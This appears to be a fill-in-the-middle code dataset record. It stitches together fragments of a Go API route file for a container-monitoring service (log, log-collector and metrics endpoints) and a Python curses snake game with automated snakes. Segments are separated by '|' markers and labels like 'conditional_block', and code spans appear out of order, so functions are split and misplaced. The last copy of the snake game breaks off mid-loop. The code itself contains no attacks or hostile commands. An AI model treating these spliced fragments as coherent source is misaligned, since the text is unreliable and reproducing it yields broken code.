route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), m | y/targetgroups", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
| iddleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discover | identifier_body |
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr |
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
| {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
} | conditional_block |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
|
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise
msg = 'Thanks for playing!'
raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main)
| d = d * r
p += d
res.append(d)
break | conditional_block |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
